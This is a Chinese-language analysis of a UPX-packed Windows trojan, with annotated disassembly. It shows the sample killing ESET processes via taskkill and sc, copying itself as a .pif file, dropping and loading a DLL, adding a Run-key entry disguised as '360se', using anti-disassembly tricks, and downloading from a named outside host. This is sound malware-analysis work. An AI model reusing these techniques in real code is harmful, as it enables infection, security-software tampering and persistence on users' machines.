文件名称:9648c7cc2f01d7b67718cb89a48d927e
文件哈希:9648c7cc2f01d7b67718cb89a48d927e
文件大小:31528字节
创建时间:2012-04-13 02:01:37
文件类型:EXE
PEID信息:UPX 2.93 (LZMA) [Overlay] *
可能受到威胁的系统:
windows
详细分析/功能介绍
1.upx解压缩执行原程序
2.提升进程权限,创建互斥体
3.保存自身到文件
4.释放dll,加载dll,修改注册表使dll自启动
5.下载文件 "http://c.shidaihuabian.com/s.gif" >> "%windir%tempolm.ini"
提升进程权限,创建互斥体,跳转到主体部分
部分反汇编代码
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
CODE:00401820 ; start(): entry of the unpacked program.  Frame = 174h bytes; ebx/esi preserved.
CODE:00401820 ; Sequence: raise privilege -> GetModuleFileName(self) -> assemble four stack
CODE:00401820 ; strings ("open", "sc.exe", "taskkill.exe", "ekrn.EXE") -> named mutex as the
CODE:00401820 ; single-instance check -> continue at @mainpart, or CloseHandle/MessageBox/ExitProcess.
CODE:00401820 push ebp
CODE:00401821 mov ebp, esp
CODE:00401823 sub esp, 174h
CODE:00401829 push ebx
CODE:0040182A push esi
CODE:0040182B push 1 ; Enable = TRUE
CODE:0040182D call _Rtladjustprivilege ; author: raises the whole process's privilege 14h (= 20 = SE_DEBUG_PRIVILEGE); wrapper body not shown
CODE:00401832 push 104h ; nSize = MAX_PATH
CODE:00401837 push offset modulepath ; lpFilename (global; reused later as CopyFile source and as Run-key data)
CODE:0040183C push 0 ; hModule = NULL -> this executable
CODE:0040183E call _getmodulefilename ; records the running program's own path
CODE:00401843 add esp, 10h ; cdecl wrappers: 4 args popped
CODE:00401846 mov al, 's' ; stack strings are assembled one byte at a time (no plaintext in the data sections)
CODE:00401848 mov [ebp+var_10], al ; var_10 = "sc.exe" (s c . e x e NUL, completed below)
CODE:0040184B mov [ebp+var_42], al ; var_44 = "taskkill.exe" (this is the 's' at index 2)
CODE:0040184E push offset Name ; "KAIFAONGQUMEIGANDE" -- lpName; single-instance mutex, a useful detection artifact
CODE:00401853 mov bl, 'e' ; bl = 'e', reused wherever an 'e' is stored below
CODE:00401855 mov al, 'E'
CODE:00401857 push 0 ; bInitialOwner
CODE:00401859 push 0 ; lpMutexAttributes
CODE:0040185B mov [ebp+var_8], 'o' ; var_8 = "open" (the verb passed to sub_4027A0 later)
CODE:0040185F mov [ebp+var_7], 'p'
CODE:00401863 mov [ebp+var_6], bl ; e
CODE:00401866 mov [ebp+var_5], 'n'
CODE:0040186A mov [ebp+var_4], 0 ; NUL
CODE:0040186E mov [ebp+var_F], 'c' ; var_10 = "sc.exe" (cont.)
CODE:00401872 mov [ebp+var_E], '.'
CODE:00401876 mov [ebp+var_D], bl ; e
CODE:00401879 mov [ebp+var_C], 'x'
CODE:0040187D mov [ebp+var_B], bl ; e
CODE:00401880 mov [ebp+var_A], 0 ; NUL
CODE:00401884 mov [ebp+var_44], 't' ; var_44 = "taskkill.exe"
CODE:00401888 mov [ebp+var_43], 'a'
CODE:0040188C mov [ebp+var_41], 'k'
CODE:00401890 mov [ebp+var_40], 'k'
CODE:00401894 mov [ebp+var_3F], 'i'
CODE:00401898 mov [ebp+var_3E], 'l'
CODE:0040189C mov [ebp+var_3D], 'l'
CODE:004018A0 mov [ebp+var_3C], '.'
CODE:004018A4 mov [ebp+var_3B], bl ; e
CODE:004018A7 mov [ebp+var_3A], 78h ; 'x' written as its ASCII code
CODE:004018AB mov [ebp+var_39], bl ; e
CODE:004018AE mov [ebp+var_38], 0 ; NUL
CODE:004018B2 mov [ebp+var_28], bl ; var_28 = "ekrn.EXE" (ESET service process name; see the sub_4028D0 check in the next listing)
CODE:004018B5 mov [ebp+var_27], 'k'
CODE:004018B9 mov [ebp+var_26], 'r'
CODE:004018BD mov [ebp+var_25], 'n'
CODE:004018C1 mov [ebp+var_24], '.'
CODE:004018C5 mov [ebp+var_23], al ; E
CODE:004018C8 mov [ebp+var_22], 'X'
CODE:004018CC mov [ebp+var_21], al ; E
CODE:004018CF mov [ebp+var_20], 0 ; NUL
CODE:004018D3 call CreateMutexA ; CreateMutexA(NULL, FALSE, "KAIFAONGQUMEIGANDE")
CODE:004018D9 mov esi, eax ; esi = mutex handle
CODE:004018DB nop ; padding
CODE:004018DC nop
CODE:004018DD nop
CODE:004018DE nop
CODE:004018DF nop
CODE:004018E0 call GetLastError
CODE:004018E6 cmp eax, 0B7h ; ERROR_ALREADY_EXISTS (183)
CODE:004018EB jnz short @mainpart ; mutex is new -> no other instance is running -> continue with the main part
CODE:004018ED push esi ; another instance already owns the mutex: release our handle and quit
CODE:004018EE call _closehandle
CODE:004018F3 add esp, 4
CODE:004018F6 nop ; padding
CODE:004018F7 nop
CODE:004018F8 nop
CODE:004018F9 nop
CODE:004018FA push 0 ; uType
CODE:004018FC push offset Caption ; "0" -- lpCaption
CODE:00401901 push offset Caption ; "0" -- lpText (same placeholder string)
CODE:00401906 push 0FFFFFFFFh ; hWnd = -1
CODE:00401908 call MessageBoxA ; box with "0"/"0"; likely leftover debug output, visible when a second copy starts
CODE:0040190E push 0 ; uExitCode
CODE:00401910 call ExitProcess
CODE:00401916 ; ---------------------------------------------------------------------------
劫持ekrn.exe, 释放c:/programfile/common file//rgdltecq//nhoifz.pif, 跳转到释放dll的部分
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
CODE:004019BB ; start (cont.): the code between 00401916 and 004019BB is omitted from this listing.
CODE:004019BB ; Uses the stack strings built earlier: var_8 = "open", var_10 = "sc.exe", var_44 = "taskkill.exe".
CODE:004019BB ; Then resolves the Common Files folder, creates <Common Files>\rgdltecq, copies itself there as
CODE:004019BB ; nhoifz.pif and calls loc_4015B0 (DLL drop / autostart).  Returns eax = 1.
CODE:004019BB call sub_4028D0 ; author: returns the PID of ekrn.exe (body not shown; presumably takes var_28 "ekrn.EXE")
CODE:004019C0 add esp, 4
CODE:004019C3 cmp eax, 1
CODE:004019C6 jbe short loc_401A2A ; ekrn.exe not running (PID <= 1, unsigned compare) -> skip the three launches below
CODE:004019C8 push 0 ; sub_4027A0 takes 6 args in the order of a ShellExecuteA-style (hwnd, verb, file, params, dir, show) call -- body not shown
CODE:004019CA lea ecx, [ebp+var_50] ; parameter buffer (contents not in this listing)
CODE:004019CD push 0
CODE:004019CF lea edx, [ebp+var_10] ; "sc.exe"
CODE:004019D2 push ecx
CODE:004019D3 lea eax, [ebp+var_8] ; "open"
CODE:004019D6 push edx
CODE:004019D7 push eax
CODE:004019D8 push 0
CODE:004019DA call sub_4027A0 ; 1st: "open" sc.exe <var_50>
CODE:004019DF push 1F4h ; 500 ms
CODE:004019E4 call _Sleep
CODE:004019E9 push 0
CODE:004019EB lea ecx, [ebp+var_60] ; parameter buffer (contents not in this listing)
CODE:004019EE push 0
CODE:004019F0 lea edx, [ebp+var_44] ; "taskkill.exe"
CODE:004019F3 push ecx
CODE:004019F4 lea eax, [ebp+var_8] ; "open"
CODE:004019F7 push edx
CODE:004019F8 push eax
CODE:004019F9 push 0
CODE:004019FB call sub_4027A0 ; 2nd: "open" taskkill.exe <var_60>
CODE:00401A00 push 1F4h ; 500 ms
CODE:00401A05 call _Sleep
CODE:00401A0A nop ; padding
CODE:00401A0B nop
CODE:00401A0C nop
CODE:00401A0D nop
CODE:00401A0E nop
CODE:00401A0F nop
CODE:00401A10 push 0
CODE:00401A12 lea ecx, [ebp+var_70] ; parameter buffer (contents not in this listing)
CODE:00401A15 push 0
CODE:00401A17 lea edx, [ebp+var_44] ; "taskkill.exe"
CODE:00401A1A push ecx
CODE:00401A1B lea eax, [ebp+var_8] ; "open"
CODE:00401A1E push edx
CODE:00401A1F push eax
CODE:00401A20 push 0
CODE:00401A22 call sub_4027A0 ; 3rd: "open" taskkill.exe <var_70>
CODE:00401A27 add esp, 50h ; 3 x 6 args + 2 Sleep args = 80 bytes (all cdecl wrappers)
CODE:00401A2A
CODE:00401A2A loc_401A2A: ; CODE XREF: start+1A6j
CODE:00401A2A push edi ; edi is the stos target below, so it is saved here
CODE:00401A2B mov ecx, 40h ; 40h dwords
CODE:00401A30 xor eax, eax
CODE:00401A32 lea edi, [ebp+var_173]
CODE:00401A38 mov [ebp+floderpath], 0 ; first byte of the path buffer (floderpath is presumably var_174)
CODE:00401A3F push 1 ; fCreate = TRUE: create the folder if it does not exist
CODE:00401A41 rep stosd ; 100h bytes ...
CODE:00401A43 stosw ; ... + 2 ...
CODE:00401A45 lea ecx, [ebp+floderpath]
CODE:00401A4B push 2Bh ; csidl = CSIDL_PROGRAM_FILES_COMMON (author: c:/programfile/common file)
CODE:00401A4D push ecx ; lpszPath
CODE:00401A4E push 0 ; hwndOwner
CODE:00401A50 stosb ; ... + 1 = 103h bytes zeroed after the leading 0: a full 104h (MAX_PATH) buffer (author wrote 43 bytes; the counts above give 103h)
CODE:00401A51 call _SHGetSpecialFloderPath ; resolves the Common Files folder path, creating it if missing
CODE:00401A56 mov esi, lstrcat ; esi = lstrcat, called through esi below
CODE:00401A5C add esp, 10h
CODE:00401A5F lea edx, [ebp+floderpath]
CODE:00401A65 mov [ebp+Caption], 'r' ; local Caption = "rgdltecq": the sub-folder name (stack string)
CODE:00401A69 push offset asc_41D8C8 ; "\"
CODE:00401A6E push edx
CODE:00401A6F mov [ebp+var_1B], 'g'
CODE:00401A73 mov [ebp+var_1A], 'd'
CODE:00401A77 mov [ebp+var_19], 'l'
CODE:00401A7B mov [ebp+var_18], 't'
CODE:00401A7F mov [ebp+var_17], bl ; e
CODE:00401A82 mov [ebp+var_16], 'c'
CODE:00401A86 mov [ebp+var_15], 'q'
CODE:00401A8A mov [ebp+var_14], 0 ; NUL
CODE:00401A8E call esi ; lstrcat(path, "\")
CODE:00401A90 lea eax, [ebp+Caption]
CODE:00401A93 lea ecx, [ebp+floderpath]
CODE:00401A99 push eax
CODE:00401A9A push ecx
CODE:00401A9B call esi ; lstrcat(path, "rgdltecq")
CODE:00401A9D lea edx, [ebp+Caption]
CODE:00401AA0 push 0 ; uType
CODE:00401AA2 lea eax, [ebp+floderpath]
CODE:00401AA8 push edx ; lpCaption = "rgdltecq"
CODE:00401AA9 push eax ; lpText = <Common Files>\rgdltecq
CODE:00401AAA push 0FFFFFFFFh ; hWnd
CODE:00401AAC call MessageBoxA ; displays the drop folder (likely leftover debug output)
CODE:00401AB2 lea ecx, [ebp+floderpath]
CODE:00401AB8 push 0 ; lpSecurityAttributes
CODE:00401ABA push ecx ; lpPathName
CODE:00401ABB call _CreateDirectory ; creates <Common Files>\rgdltecq
CODE:00401AC0 add esp, 8
CODE:00401AC3 lea edx, [ebp+floderpath]
CODE:00401AC9 mov [ebp+var_34], 'n' ; var_34 = "nhoifz.pif": file name of the self-copy (stack string)
CODE:00401ACD mov [ebp+var_33], 'h'
CODE:00401AD1 push offset asc_41D8C8 ; "\"
CODE:00401AD6 push edx
CODE:00401AD7 mov [ebp+var_32], 'o'
CODE:00401ADB mov [ebp+var_31], 'i'
CODE:00401ADF mov [ebp+var_30], 'f'
CODE:00401AE3 mov [ebp+var_2F], 'z'
CODE:00401AE7 mov [ebp+var_2E], '.'
CODE:00401AEB mov [ebp+var_2D], 'p'
CODE:00401AEF mov [ebp+var_2C], 'i'
CODE:00401AF3 mov [ebp+var_2B], 'f'
CODE:00401AF7 mov [ebp+var_2A], 0 ; NUL
CODE:00401AFB call esi ; lstrcat(path, "\")
CODE:00401AFD lea eax, [ebp+var_34]
CODE:00401B00 lea ecx, [ebp+floderpath]
CODE:00401B06 push eax
CODE:00401B07 push ecx
CODE:00401B08 call esi ; lstrcat(path, "nhoifz.pif")
CODE:00401B0A lea edx, [ebp+floderpath] ; <Common Files>\rgdltecq\nhoifz.pif (author's rendering: c:/programfile/common file//rgdltecq//nhoifz.pif)
CODE:00401B10 push 0 ; bFailIfExists = FALSE: an existing copy is overwritten
CODE:00401B12 push edx ; lpNewFileName
CODE:00401B13 push offset modulepath ; lpExistingFileName = own path from GetModuleFileName
CODE:00401B18 call _copyfilename ; copies this executable to the path above (the shell runs a .pif as a program)
CODE:00401B1D push 0FA0h ; 4000 ms
CODE:00401B22 call _Sleep
CODE:00401B27 add esp, 10h
CODE:00401B2A call loc_4015B0 ; DLL drop / load / autostart registration (listed at 004015B0 below)
CODE:00401B2F pop edi
CODE:00401B30 pop esi
CODE:00401B31 mov eax, 1 ; return 1
CODE:00401B36 pop ebx
CODE:00401B37 mov esp, ebp
CODE:00401B39 pop ebp
CODE:00401B3A retn
CODE:00401B3A start endp
CODE:00401B3A
CODE:00401B3A ; ---------------------------------------------------------------------------
释放dll,加载dll,修改注册表使dll开机自动加载。这一部分的分析花费了好长时间,dll本身的分析等下次吧
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
CODE:004015B0 ; loc_4015B0(): writes a DLL named from GetTickCount into the system directory, loads it,
CODE:004015B0 ; calls its exports "Whaier" and "Simenze", then registers autostart: on dwMajorVersion >= 6
CODE:004015B0 ; via loc_4014B0(HKLM, "Software\Microsoft\Windows\CurrentVersion\Run", "360se", modulepath),
CODE:004015B0 ; on older Windows via @change_reg2(dll path).  Frame = 1E0h bytes; ebx/esi/edi preserved.
CODE:004015B0 ; Returns eax = 1.  Called from start at 00401B2A.
CODE:004015B0 loc_4015B0: ; CODE XREF: start+30Ap
CODE:004015B0 push ebp
CODE:004015B1 mov ebp, esp
CODE:004015B3 sub esp, 1E0h
CODE:004015B9 push ebx
CODE:004015BA push esi
CODE:004015BB push edi
CODE:004015BC nop ; padding
CODE:004015BD nop
CODE:004015BE nop
CODE:004015BF nop
CODE:004015C0 jb short loc_4015C5 ; anti-disassembly: jb + jnb to the same target is an unconditional jump
CODE:004015C2 jnb short loc_4015C5 ; split in two, so a linear sweep decodes the junk byte below as code
CODE:004015C2 ; ---------------------------------------------------------------------------
CODE:004015C4 db 0E8h ; ? -- never executed; E8 is the CALL opcode, so a linear disassembler swallows the next 4 bytes
CODE:004015C5 ; ---------------------------------------------------------------------------
CODE:004015C5
CODE:004015C5 loc_4015C5: ; CODE XREF: CODE:004015C0j
CODE:004015C5 ; CODE:004015C2j
CODE:004015C5 mov ecx, 40h ; 40h dwords
CODE:004015CA xor eax, eax
CODE:004015CC lea edi, [ebp-14Bh]
CODE:004015D2 mov byte ptr [ebp-14Ch], 0 ; first byte of the path buffer at ebp-14Ch
CODE:004015D9 rep stosd ; 100h bytes ...
CODE:004015DB stosw ; ... + 2 ...
CODE:004015DD stosb ; ... + 1 = 103h bytes zeroed from -14Bh: a full 104h (MAX_PATH) buffer (author wrote 43h; the counts give 103h)
CODE:004015DE lea eax, [ebp-14Ch]
CODE:004015E4 push 104h ; uSize = MAX_PATH
CODE:004015E9 push eax ; lpBuffer
CODE:004015EA call _getsystemdirectory ; path buffer = system directory
CODE:004015EF xor ecx, ecx
CODE:004015F1 add esp, 8
CODE:004015F4 mov [ebp-47h], ecx ; zero an 8-byte name buffer at ebp-48h (1 + 4 + 2 + 1 bytes)
CODE:004015F7 mov byte ptr [ebp-48h], 0
CODE:004015FB mov [ebp-43h], cx
CODE:004015FF mov [ebp-41h], cl
CODE:00401602 call GetTickCount ; uptime in ms becomes the DLL file name -> the name differs per run
CODE:00401608 push eax ; %d
CODE:00401609 lea edx, [ebp-48h]
CODE:0040160C push offset aD_dll ; "\%d.DLL" -- format string (this line is wrapped in the original listing)
CODE:00401611 push edx ; output = ebp-48h
CODE:00401612 call wsprintfA ; ebp-48h = "\<tickcount>.DLL" (author's note "systemruntime.dll" does not match the visible format string)
CODE:00401618 lea edi, [ebp-48h] ; inline strcat(sysdir, name): first strlen(name)
CODE:0040161B or ecx, 0FFFFFFFFh
CODE:0040161E xor eax, eax ; eax = 0: scan for NUL; still 0 when pushed as uType below
CODE:00401620 add esp, 0Ch
CODE:00401623 repne scasb
CODE:00401625 not ecx ; ecx = strlen(name) + 1 (incl. NUL)
CODE:00401627 sub edi, ecx ; edi back to the start of name
CODE:00401629 lea edx, [ebp-14Ch]
CODE:0040162F mov esi, edi ; esi = copy source (name)
CODE:00401631 mov ebx, ecx ; ebx = byte count
CODE:00401633 mov edi, edx
CODE:00401635 or ecx, 0FFFFFFFFh
CODE:00401638 repne scasb ; strlen(sysdir)
CODE:0040163A mov ecx, ebx
CODE:0040163C dec edi ; edi = sysdir's terminating NUL: the append point
CODE:0040163D shr ecx, 2
CODE:00401640 rep movsd ; copy name in dwords ...
CODE:00401642 push eax ; uType = 0
CODE:00401643 mov ecx, ebx
CODE:00401645 lea eax, [ebp-14Ch] ; author: %system%systemruntime.dll; per the format string: <sysdir>\<tickcount>.DLL
CODE:0040164B and ecx, 3
CODE:0040164E push eax ; lpText = DLL path
CODE:0040164F push offset a1 ; "1" -- lpCaption
CODE:00401654 rep movsb ; ... then the remaining 0-3 bytes (incl. NUL)
CODE:00401656 push 0FFFFFFFFh ; hWnd
CODE:00401658 call MessageBoxA ; shows the DLL path (likely leftover debug output)
CODE:0040165E lea ecx, [ebp-14Ch]
CODE:00401664 push ecx ; DLL path
CODE:00401665 call @releaseDLL ; writes the embedded DLL to that path (body not shown); returns al != 0 on success
CODE:0040166A add esp, 4
CODE:0040166D test al, al
CODE:0040166F jz loc_401803 ; DLL drop failed -> jump to the exit
CODE:00401675 push 1388h ; 5000 ms
CODE:0040167A call _Sleep
CODE:0040167F add esp, 4
CODE:00401682 lea edx, [ebp-14Ch]
CODE:00401688 push edx ; lpLibFileName = dropped DLL path
CODE:00401689 call LoadLibraryA ; loads the DLL just written
CODE:0040168F mov esi, eax ; esi = hModule
CODE:00401691 test esi, esi
CODE:00401693 jz loc_401803 ; load failed -> exit
CODE:00401699 mov edi, GetPro
caddress ; (continuation of the wrapped line: edi = GetProcAddress)
CODE:0040169F lea eax, [ebp-8] ; ebp-8 = "Whaier" (stack string, assembled below)
CODE:004016A2 mov bl, 'r' ; bl = 'r' for the rest of the function
CODE:004016A4 push eax ; lpProcName
CODE:004016A5 push esi ; hModule
CODE:004016A6 mov byte ptr [ebp-8], 'W'
CODE:004016AA mov byte ptr [ebp-7], 'h'
CODE:004016AE mov byte ptr [ebp-6], 'a'
CODE:004016B2 mov byte ptr [ebp-5], 'i'
CODE:004016B6 mov byte ptr [ebp-4], 'e'
CODE:004016BA mov [ebp-3], bl ; r
CODE:004016BD mov byte ptr [ebp-2], 0 ; NUL
CODE:004016C1 call edi ; GetProcAddress ; GetProcAddress(hModule, "Whaier")
CODE:004016C3 push 0 ; single argument 0
CODE:004016C5 call eax ; calls the dropped DLL's Whaier export
CODE:004016C7 push 1388h ; 5000 ms
CODE:004016CC call _Sleep
CODE:004016D1 add esp, 8
CODE:004016D4 lea ecx, [ebp-10h] ; ebp-10h = "Simenze" (stack string, assembled below)
CODE:004016D7 mov byte ptr [ebp-10h], 'S'
CODE:004016DB mov byte ptr [ebp-0Fh], 'i'
CODE:004016DF push ecx ; lpProcName
CODE:004016E0 push esi ; hModule
CODE:004016E1 mov byte ptr [ebp-0Eh], 'm'
CODE:004016E5 mov byte ptr [ebp-0Dh], 'e'
CODE:004016E9 mov byte ptr [ebp-0Ch], 'n'
CODE:004016ED mov byte ptr [ebp-0Bh], 'z'
CODE:004016F1 mov byte ptr [ebp-0Ah], 'e'
CODE:004016F5 mov byte ptr [ebp-9], 0 ; NUL
CODE:004016F9 call edi ; GetProcAddress ; GetProcAddress(hModule, "Simenze")
CODE:004016FB push 0 ; single argument 0
CODE:004016FD call eax ; calls the dropped DLL's Simenze export
CODE:004016FF add esp, 4
CODE:00401702 lea edx, [ebp-1E0h] ; OSVERSIONINFOA at ebp-1E0h
CODE:00401708 mov d
word ptr [ebp-1E0h], 94h ; (wrapped line: mov dword ptr [ebp-1E0h], 94h) dwOSVersionInfoSize = 148 = sizeof(OSVERSIONINFOA)
CODE:00401712 push edx ; lpVersionInformation
CODE:00401713 call GetVersionExA
CODE:00401719 cmp d
word ptr [ebp-1DCh], 6 ; (wrapped line: cmp dword ptr [ebp-1DCh], 6) dwMajorVersion (offset +4) against 6
CODE:00401720 jnb short loc_401736 ; major >= 6, i.e. Vista or later (author wrote "above 98") -> HKLM Run path below
CODE:00401722 lea eax, [ebp-14Ch] ; XP and earlier: @change_reg2(dll path)
CODE:00401728 push eax
CODE:00401729 call @change_reg2 ; body not shown
CODE:0040172E add esp, 4
CODE:00401731 jmp loc_401803
CODE:00401736 ; ---------------------------------------------------------------------------
CODE:00401736
CODE:00401736 loc_401736: ; CODE XREF: CODE:00401720j
CODE:00401736 call @change_reg ; author: modifies the registry to raise privileges, which "makes the virus safer" (body not shown)
CODE:0040173B mov cl, '' ; cl = path separator; the literal did not survive extraction, its placement between the key components below implies '\'
CODE:0040173D push offset modulepath ; value data = own executable path
CODE:00401742 mov [ebp-38h], cl ; separators between Software / Microsoft / Windows / CurrentVersion / Run
CODE:00401745 mov [ebp-2Eh], cl
CODE:00401748 mov [ebp-26h], cl
CODE:0040174B mov [ebp-17h], cl
CODE:0040174E lea ecx, [ebp-40h] ; ebp-40h = "Software\Microsoft\Windows\CurrentVersion\Run" (stack string, assembled below)
CODE:00401751 push offset a360se ; "360se" -- value name; resembles the 360 Secure Browser executable name
CODE:00401756 mov al, 'o'
CODE:00401758 mov dl, 's'
CODE:0040175A push ecx ; subkey
CODE:0040175B push 80000002h ; HKEY_LOCAL_MACHINE
CODE:00401760 mov byte ptr [ebp-40h], 'S' ; "Software"
CODE:00401764 mov [ebp-3Fh], al ; o
CODE:00401767 mov byte ptr [ebp-3Eh], 'f'
CODE:0040176B mov byte ptr [ebp-3Dh], 't'
CODE:0040176F mov byte ptr [ebp-3Ch], 'w'
CODE:00401773 mov byte ptr [ebp-3Bh], 'a'
CODE:00401777 mov [ebp-3Ah], bl ; r
CODE:0040177A mov byte ptr [ebp-39h], 'e'
CODE:0040177E mov byte ptr [ebp-37h], 'M' ; "Microsoft"
CODE:00401782 mov byte ptr [ebp-36h], 'i'
CODE:00401786 mov byte ptr [ebp-35h], 'c'
CODE:0040178A mov [ebp-34h], bl ; r
CODE:0040178D mov [ebp-33h], al ; o
CODE:00401790 mov [ebp-32h], dl ; s
CODE:00401793 mov [ebp-31h], al ; o
CODE:00401796 mov byte ptr [ebp-30h], 'f'
CODE:0040179A mov byte ptr [ebp-2Fh], 't'
CODE:0040179E mov byte ptr [ebp-2Dh], 'W' ; "Windows"
CODE:004017A2 mov byte ptr [ebp-2Ch], 'i'
CODE:004017A6 mov byte ptr [ebp-2Bh], 'n'
CODE:004017AA mov byte ptr [ebp-2Ah], 'd'
CODE:004017AE mov [ebp-29h], al ; o
CODE:004017B1 mov byte ptr [ebp-28h], 'w'
CODE:004017B5 mov [ebp-27h], dl ; s
CODE:004017B8 mov byte ptr [ebp-25h], 'C' ; "CurrentVersion"
CODE:004017BC mov byte ptr [ebp-24h], 'u'
CODE:004017C0 mov [ebp-23h], bl ; r
CODE:004017C3 mov [ebp-22h], bl ; r
CODE:004017C6 mov byte ptr [ebp-21h], 'e'
CODE:004017CA mov byte ptr [ebp-20h], 'n'
CODE:004017CE mov byte ptr [ebp-1Fh], 't'
CODE:004017D2 mov byte ptr [ebp-1Eh], 'V'
CODE:004017D6 mov byte ptr [ebp-1Dh], 'e'
CODE:004017DA mov [ebp-1Ch], bl ; r
CODE:004017DD mov [ebp-1Bh], dl ; s
CODE:004017E0 mov byte ptr [ebp-1Ah], 'i'
CODE:004017E4 mov [ebp-19h], al ; o
CODE:004017E7 mov byte ptr [ebp-18h], 'n'
CODE:004017EB mov byte ptr [ebp-16h], 'R' ; "Run"
CODE:004017EF mov byte ptr [ebp-15h], 'u'
CODE:004017F3 mov byte ptr [ebp-14h], 'n'
CODE:004017F7 mov byte ptr [ebp-13h], 0 ; NUL
CODE:004017FB call loc_4014B0 ; loc_4014B0(HKLM, "Software\...\Run", "360se", modulepath): autostart registration (body not shown)
CODE:00401800 add esp, 10h
CODE:00401803
CODE:00401803 loc_401803: ; CODE XREF: CODE:0040166Fj
CODE:00401803 ; CODE:00401693j ...
CODE:00401803 push 2710h ; 10000 ms
CODE:00401808 call Sleep
CODE:0040180E pop edi
CODE:0040180F pop esi
CODE:00401810 mov eax, 1 ; return 1
CODE:00401815 pop ebx
CODE:00401816 mov esp, ebp
CODE:00401818 pop ebp
CODE:00401819 retn
CODE:00401819 ; ---------------------------------------------------------------------------
CODE:0040181A align 10h
CODE:00401820
作者 麦小扣